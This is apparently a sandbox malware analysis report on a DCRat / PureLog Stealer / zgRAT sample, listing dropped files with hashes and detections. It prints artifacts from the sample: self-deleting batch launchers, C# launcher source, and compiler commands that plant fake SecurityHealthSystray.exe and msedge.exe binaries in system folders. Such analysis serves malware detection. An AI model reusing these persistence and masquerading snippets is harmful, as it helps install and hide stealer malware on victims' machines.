| | DC86.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | |
| | WinPerfcommon.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | |
| | Udzp7lL5ns.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | |
| | loader.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | |
| | hz7DzW2Yop.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | |
| | 7aHY4r6vXR.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | |
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:MSVC .res
                                                                  Category:dropped
                                                                  Size (bytes):1168
                                                                  Entropy (8bit):4.448520842480604
                                                                  Encrypted:false
                                                                  SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                  MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                  SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                  SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                  SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                  Malicious:false
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):4608
                                                                  Entropy (8bit):3.9068031664580603
                                                                  Encrypted:false
                                                                  SSDEEP:48:6HmBthxZ8RxeOAkFJOcV4MKe28dsd4AWvqBHbuulB+hnqXSfbNtm:HexvxVx91vkNTkZzNt
                                                                  MD5:998E484FDD980EE25C6B31E000884188
                                                                  SHA1:F3D0E823C5093D4AFCCE7E3B00989B52B76F1A78
                                                                  SHA-256:72E9AC11A2B418ED2C2F73452961D8DB617767E6D84CA3E8CD4535EFC7F500BD
                                                                  SHA-512:43B026F710397167E4FFA57E3FCC9E8D7C236EF3F61454336FFE71D03E62D33ABD8D7170FE6D095A80BDA2F928F5CE2E46E55D4B367F59F8735607FBB6A2D2E7
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with very long lines (364), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):364
                                                                  Entropy (8bit):5.797295390114544
                                                                  Encrypted:false
                                                                  SSDEEP:6:AAra9uyRvq+XEWhLiRnTVxR/ImMaVlaRs0qhEWnF+m9//kbPTaNBextKw8WHWxcY:AAgy+NRinX/I5esRs0AEVy/ygBYIraQH
                                                                  MD5:278BD2271A21B01BEE6E0DDFF3518B17
                                                                  SHA1:8188A2D3D4C78B86F1FE906E50A4D51DA8402B33
                                                                  SHA-256:336C7CF8EF6A006D8D9AC9863ECF66196245614A22B246F5CD97AA56B5726C99
                                                                  SHA-512:C8D8B49D627D625D1ABD6D5AA5CB58FFF25FAC68D154D351A56D52275EF7AF7E69AC29E7E3BE83B38D72E1E8F6C4981EFC2B818297259C0A235832E8D43CC63B
                                                                  Malicious:false
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with very long lines (845), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):845
                                                                  Entropy (8bit):5.897614772047287
                                                                  Encrypted:false
                                                                  SSDEEP:12:Cr42WpCrApUCl5glvZXzcet9oMPDeSdef8Yjz4sTW17bJEj+2+tazYMLegG:04UGqlBzt9rLSUYjz4d2+btkyx
                                                                  MD5:ECBAAB294C165D0E25952251D1A8AF6E
                                                                  SHA1:15F7DA23E33A613565F716EC0D01F4474A4216A5
                                                                  SHA-256:B018C02EB84BED011EABAB1BB6D25CF277DBED9B7CDC5F69120C8BAE131AE404
                                                                  SHA-512:B561897E467A566150788D183C05E71E4A036359649A7E404A09F9119E49F71F9B56FBEF8559238BA6C7D98C860E0160C23668A7DF1FEDB8059540F8339E1DE5
                                                                  Malicious:false
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\dbg\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\dbg\containerReview.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):248
                                                                  Entropy (8bit):5.784020017648331
                                                                  Encrypted:false
                                                                  SSDEEP:6:m2Iq9YR3fBDBf0JosJsoZs34L/yZNmXpAK8eHwzvRF:m69M5Dd0lzs34L0yphjwzvr
                                                                  MD5:3EAD95FD634626C32753A34629866057
                                                                  SHA1:3E5ABE269E18EF4BCBAC064D5C16E3C90DBD4AEA
                                                                  SHA-256:1CB6BC1DF5C79913CB8217FC2794522C1BB84F604B92A667A619943796CC95F1
                                                                  SHA-512:D98407622A008DC7004F9AFDFBB9F5BAA91CB2283590CD2992CE3976608C8531CAB73B017201B96699D5C2B54F5166329C3D66C484803BF0F99F7B0B23342302
                                                                  Malicious:false
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):279
                                                                  Entropy (8bit):5.789804915950466
                                                                  Encrypted:false
                                                                  SSDEEP:6:ZWIIK5tOMcn1i4e51sLz68UKWczRGSwr0cghkktpNB8Wa1:ZRIocYsLDaU+rRghkk7b+
                                                                  MD5:631C1C297D8462129BBDE3EFF97D1F14
                                                                  SHA1:5B8A8E938394A95FC7792B19A3FB058E0B34A79C
                                                                  SHA-256:8ED6065E580E092841C3D57F8BF45BA9D80C487216301192FF19A06C9B743CC7
                                                                  SHA-512:3FBE75B22ED372A56E859637FC2FEF8DFB866019A0E90EB1E5A6C8D86CEFC193CDF0C81232E58B3EEE9098D48340DE1976D628FAA494C311AB3EE2B0F9839445
                                                                  Malicious:false
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1396
                                                                  Entropy (8bit):5.350961817021757
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1830
                                                                  Entropy (8bit):5.3661116947161815
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktJtpaqZ4vwmj0K
                                                                  MD5:C2E0F17D6A14A9837FE55EE183305037
                                                                  SHA1:EB56F87DAE280A52D91E88872777FDEEB2E1DF76
                                                                  SHA-256:8D444C9F4CB992629221443E699471F7D71BA2F0FFFC1F9BEBBA9D2F18371D47
                                                                  SHA-512:F4C96FF497F0AF4756F6A65350B2F9CF3AE54CEF07E38FDF31AC653765F731256D2625E287C6AC3471A87297CC51EF4D37E857C7F51D4735681B20F0B376D855
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicK
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):210
                                                                  Entropy (8bit):5.1931694791072
                                                                  Encrypted:false
                                                                  SSDEEP:6:hCijTg3Nou1SV+DEBdvsvKOZG1923fliwfoRH:HTg9uYDE8ZAwAh
                                                                  MD5:E4D9DB7B862AE06C57031608714A9D2F
                                                                  SHA1:9044E283A21C94F193EE6F6ECE8AF9F985DFF3B8
                                                                  SHA-256:65D13E31C04DAABE8AAE551947E1D06FE51BA38EBA5977699AE4CD2A54CBC17E
                                                                  SHA-512:CD87E41D35CFE22F2BA3E365FB66D6B5B3D68BF6AEB215EE8846BF87C95A0D186AC37E9ECDBDC02898535E15275B18885AFC7AEB00EB11073FD473B541E6C72B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\blockcomSession\mQBLhXIPAJ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2BGdjLelXV.bat"
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Mon Jan 13 13:15:49 2025, 1st section name ".debug$S"
                                                                  Category:dropped
                                                                  Size (bytes):1924
                                                                  Entropy (8bit):4.6006675469885066
                                                                  Encrypted:false
                                                                  SSDEEP:48:/aLzta0uYD9PKPilmuulB+hnqXSfbNtmhn:Cn00uYRKPi2TkZzNtyn
                                                                  MD5:321DC5544F8AFB7F3BB31E27597989BD
                                                                  SHA1:D7FBCC15130D176F88523F434F622708AAA5DFFD
                                                                  SHA-256:8215FE1EFABF1CB4FEACB7DED98477EAA8D7BA7DCC527B04E4A46BA632B8CA79
                                                                  SHA-512:6B4279BC6F6826F58C22B6AAF59B2590573ECAB3F7B8942B94B1BAFFFC758CD753AC6DA4822E9B0DB773C573281A118EA7D1D26EB2A481A4E93775574ABBC70A
                                                                  Malicious:false
                                                                  Preview:L......g.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP.....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES8539.tmp.-.<....................a..Microsoft (R) CVTRES.Z.=..cwd.C:\blockcomSession.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Mon Jan 13 13:15:50 2025, 1st section name ".debug$S"
                                                                  Category:dropped
                                                                  Size (bytes):1952
                                                                  Entropy (8bit):4.550900254610488
                                                                  Encrypted:false
                                                                  SSDEEP:24:HbZbW97OTUxmQmpHdpFwKmwN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:/Jp9wKPKluOulajfqXSfbNtmh5Z
                                                                  MD5:12FC4A71778B4D76ACD2E14F95323554
                                                                  SHA1:57A926FA6910CCB1C79E3D1F8112A9CCCA88B18E
                                                                  SHA-256:071FBF8013DB34B70BD419808DEE02676CF194CD2D2B73659AB00B99363A569B
                                                                  SHA-512:2C6D06645997C00DFFE0189C637793745D74BCB3831A7DF048E41BB7055E5803C326969E5C3E2540945692FB083D34E0D09BA5CC9368E24B25926110E92F5719
                                                                  Malicious:false
                                                                  Preview:L......g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........=....c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES87BA.tmp.-.<....................a..Microsoft (R) CVTRES.Z.=..cwd.C:\blockcomSession.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):219
                                                                  Entropy (8bit):5.08257371103224
                                                                  Encrypted:false
                                                                  SSDEEP:6:hCijTg3Nou1SV+DE1ID6r4sKOZG1923fn8/kh:HTg9uYDE350/q
                                                                  MD5:EFF161C6218937BDDFF7AAB80EEFBB42
                                                                  SHA1:CAE8983C75147D542DC78359CE0D3EF9D79333D7
                                                                  SHA-256:E07456EAC00391DE77DA9771DDE7FAC7C1422A1BCC7836881140D9E41ED1346A
                                                                  SHA-512:E007A86E974063C6188FC469EB35924DA098C768C718431D1510388DB2EFE75769ECBBAC99F8E24385C1B3857D21762CF227808D8A9CE71FA11D8F39F1CE2B9B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\All Users\dbg\containerReview.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\aQ1wx53V7n.bat"
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                  Category:dropped
                                                                  Size (bytes):389
                                                                  Entropy (8bit):5.016520310032085
                                                                  Encrypted:false
                                                                  SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6FWaiFkD:JNVQIbSfhV7TiFkMSfhWA7FkD
                                                                  MD5:066983894FBB9214F01499462F5AE2A7
                                                                  SHA1:5027746611A46BED290E2FBE21EFBCE7F5847E5A
                                                                  SHA-256:1E5C801B9436DE20615C073BF3772DA10B68F4262CB675E9F9EF70E7C0137A37
                                                                  SHA-512:4B277B14FDB52EDA5C63E4F319E29D66DF861F8DE19BF1AA47878D288AD998958908D7D539F40CBFDA9A05A2DB4D200B0815FDD3BF538FE0B22BDEC8E5C06F19
                                                                  Malicious:false
                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe"); } catch { } }).Start();. }.}.
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):251
                                                                  Entropy (8bit):5.086047326415898
                                                                  Encrypted:false
                                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923f/YUn:Hu7L//TRq79cQyJ
                                                                  MD5:3C0BADC3DAAD991E2E34E6FF69B04947
                                                                  SHA1:58806495CE13CF84374A2D2F3E73DD373B8C9904
                                                                  SHA-256:1509B8D134F0C0F0A9F7AFAC12E42071F6629F9515622E247C6C8AED7BE09B86
                                                                  SHA-512:A8E1D626DA6FB131A9A03E2B820DB6E69D38958469D1D4D53D4CECE5CB3FC92CE8E9BFD5D3BA45985060FF641BFB0250C35E4FF453A0584F00941C93071CA966
                                                                  Malicious:false
                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.0.cs"
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (326), with CRLF, CR line terminators
                                                                  Category:modified
                                                                  Size (bytes):747
                                                                  Entropy (8bit):5.25697441809899
                                                                  Encrypted:false
                                                                  SSDEEP:12:lI/u7L//TRq79cQyMKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:lI/un/Vq79tyMKax5DqBVKVrdFAMBJTH
                                                                  MD5:C395ACE0C523ADE603E26F439FB0999A
                                                                  SHA1:7BA022026B2E30296987A5237A904C62AD67C381
                                                                  SHA-256:FF1B416C44F44538A3B41579D6C07E18258A7FD08298E6BFBC88D4648BA5C88F
                                                                  SHA-512:DD95AD4B8803EBB7426545F973544DE3D262C62B7BE6EF2769852E66777463FE9457356D5D4EA3E3A57175BFA7172A14DBBEAB1961933821E9761FFBCD2F60B9
                                                                  Malicious:false
                                                                  Preview:.C:\blockcomSession> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                  Category:dropped
                                                                  Size (bytes):404
                                                                  Entropy (8bit):5.0377442448891125
                                                                  Encrypted:false
                                                                  SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6FWaiFkD:JNVQIbSfhWLzIiFkMSfhWA7FkD
                                                                  MD5:5789E05818A6F95850DA7807889902FD
                                                                  SHA1:10CC8E32D2260E5533CB6086B6645442A567E601
                                                                  SHA-256:051C97BE0B64E5E8909865F9B3E759FF9A989A43FBAF283FB8FC1CD4DAD9993C
                                                                  SHA-512:38D97BA0E8272D1FF890B76A441DBE3FE63B62A7EBD9FAA1CE2F125A111B5DA7D1185A2C79DD6FE13DE10176280FC48885F4E8F7C1C989334BABDF336E788B59
                                                                  Malicious:false
                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe"); } catch { } }).Start();. }.}.
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):266
                                                                  Entropy (8bit):5.154498425014157
                                                                  Encrypted:false
                                                                  SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fE4VBn:Hu7L//TRRzscQyn/
                                                                  MD5:0FE78B7C63FCED35143B43A2CE77F859
                                                                  SHA1:AB40C85C37D395C49F6A141090B6DD4F1953A9BE
                                                                  SHA-256:461F3171D54E76369E4E8838395B313233D5CBDD8487CCD3069954BE183BFBDE
                                                                  SHA-512:554EA5D54AA931EB92537F43EC748D5624CCEC3C84C751D44ABE919C9997B09F1805FBBBD8E2B0464561FB70F341ECB82117883CC70FD41B758D5FA22C84C3A6
                                                                  Malicious:true
                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.0.cs"
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (341), with CRLF, CR line terminators
                                                                  Category:modified
                                                                  Size (bytes):762
                                                                  Entropy (8bit):5.2584987604588695
                                                                  Encrypted:false
                                                                  SSDEEP:12:lI/u7L//TRRzscQynmKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:lI/un/VRzstynmKax5DqBVKVrdFAMBJj
                                                                  MD5:2864B51CAB8CBE245483AA440E810165
                                                                  SHA1:48E7380FFA40FE5D76B77E925C5D4AECD528E6C0
                                                                  SHA-256:AB0D9B81AEDAE585BA05AFD43F34B64E15B801BC5A81DDE3BEFCAA69E12A6B55
                                                                  SHA-512:1EE539C69889F5DE2D74EE6C33385C637973A199F73A98425DB879432D0AD0617A52244EE7C17DDC33424DA90C58DF27B7F4569B25400B8358115410B11017A4
                                                                  Malicious:false
                                                                  Preview:.C:\blockcomSession> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.133660689688185
                                                                  Encrypted:false
                                                                  SSDEEP:3:dVwwt97E4DHn:daOH
                                                                  MD5:7339575A9A4751FDA40538F2321C479F
